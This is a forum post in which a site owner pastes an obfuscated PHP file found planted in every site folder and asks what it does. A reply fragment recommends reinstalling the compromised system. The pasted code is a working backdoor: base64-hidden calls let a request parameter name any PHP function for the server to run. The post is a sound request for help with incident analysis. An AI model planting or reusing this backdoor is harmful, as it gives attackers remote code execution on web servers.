Here is the PHP script I have found at the root of each of my website folder. Script name is fcb.php
Content is :
<? $GLOBALS['_1303753477_']=Array(base64_decode('YX' .'JyYXlfZGlmZl91a2V5'),base64_decode('c3RyaXBz' .'bG' .'F' .'z' .'aGVz')); ?><? function _1935386521($i){$a=Array('cGFzc3dvcmQ=','cmVfcGFzc3dvcmQ=','bG9naW4=');return base64_decode($a[$i]);} ?><?php @$GLOBALS['_1303753477_'][0](@array((string)$_REQUEST[_1935386521(0)]=>round(0+0.25+0.25+0.25+0.25)),@array((string)$GLOBALS['_1303753477_'][1]($_REQUEST[_1935386521(1)])=>round(0+0.4+0.4+0.4+0.4+0.4)),$_REQUEST[_1935386521(2)]); ?>
Can somebody explain what this does? Thanks.
a select few of the malicious files and go about one's business... (In case it isn't obvious, you reinstall the bloody thing from scratch because you can never be sure to find and revert all malicious changes on a comprised system.)